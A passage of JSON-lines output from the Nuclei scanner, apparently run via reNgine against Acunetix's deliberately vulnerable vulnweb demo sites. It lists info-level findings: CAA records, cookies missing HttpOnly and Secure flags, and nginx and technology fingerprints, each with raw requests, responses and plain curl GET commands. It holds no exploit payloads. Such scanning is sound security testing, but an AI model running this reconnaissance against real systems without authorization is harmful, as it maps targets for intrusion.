EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1798\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:36.224404394Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 22604\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 22604\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1798\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:36.224706418Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 47956\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 47956\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1798\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:36.225242501Z\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/cookies-without-httponly.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/cookies-without-httponly\",\"template-id\":\"cookies-without-httponly\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/cookies-without-httponly.yaml\",\"info\":{\"name\":\"Cookies without HttpOnly attribute - Detect\",\"author\":[\"princechaddha\",\"mr.bobo hp\"],\"tags\":[\"misconfig\",\"http\",\"cookie\",\"generic\"],\"description\":\"Checks whether cookies in the HTTP response contain the HttpOnly attribute. If the HttpOnly flag is set, it means that the cookie is HTTP-only\\n\",\"impact\":\"Lack of HttpOnly flag on cookies increases the risk of client-side attacks, compromising user session security and data privacy.\\n\",\"reference\":[\"https://owasp.org/www-community/HttpOnly\"],\"severity\":\"info\",\"metadata\":{\"verified\":true,\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":null,\"cvss-metrics\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\"},\"remediation\":\"Ensure that all cookies are set with the HttpOnly attribute to prevent client-side access.\\n\"},\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:32 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=IAFOKMIBEGJADIFBBNBAOKMB; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:34:36.619457184Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/cookies-without-secure.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/cookies-without-secure\",\"template-id\":\"cookies-without-secure\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/cookies-without-secure.yaml\",\"info\":{\"name\":\"Cookies without Secure attribute - Detect\",\"author\":[\"vthiery\"],\"tags\":[\"misconfig\",\"http\",\"cookie\",\"generic\"],\"description\":\"Checks whether cookies in the HTTP response contain the Secure attribute. If the Secure flag is set, it means that the cookie can only be transmitted over HTTPS\\n\",\"impact\":\"Lack of Secure flag on cookies allows the cookie to be sent over unsecure HTTP, making it vulnerable to man-in-the-middle (MITM) attacks.\\n\",\"reference\":[\"https://owasp.org/www-community/controls/SecureCookieAttribute\"],\"severity\":\"info\",\"metadata\":{\"verified\":true,\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":null,\"cvss-metrics\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\"},\"remediation\":\"Ensure that all cookies are set with the Secure attribute to prevent MITM attacks.\\n\"},\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:32 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=IAFOKMIBEGJADIFBBNBAOKMB; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:34:36.619748516Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/forgotpw\",\"path\":\"/forgotpw\",\"matched-at\":\"http://testhtml5.vulnweb.com/forgotpw\",\"request\":\"GET /forgotpw HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.749908832Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/forgotpw'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/.carousel\",\"path\":\"/.carousel\",\"matched-at\":\"http://testhtml5.vulnweb.com/.carousel\",\"request\":\"GET /.carousel HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.51\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 NOT FOUND\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.753167045Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.51' 'http://testhtml5.vulnweb.com/.carousel'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/samples\",\"path\":\"/samples\",\"matched-at\":\"http://testhtml5.vulnweb.com/samples\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /samples HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:47.0) Gecko/20100101 Firefox/47.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\n\\u003chead\\u003e\\n \\u003ctitle\\u003ePython samples\\u003c/title\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n \\u003ch3\\u003eSimple python programs:\\u003c/h3\\u003e\\n \\u003cul\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eFirst sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eSecond sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.622779031Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:47.0) Gecko/20100101 Firefox/47.0' 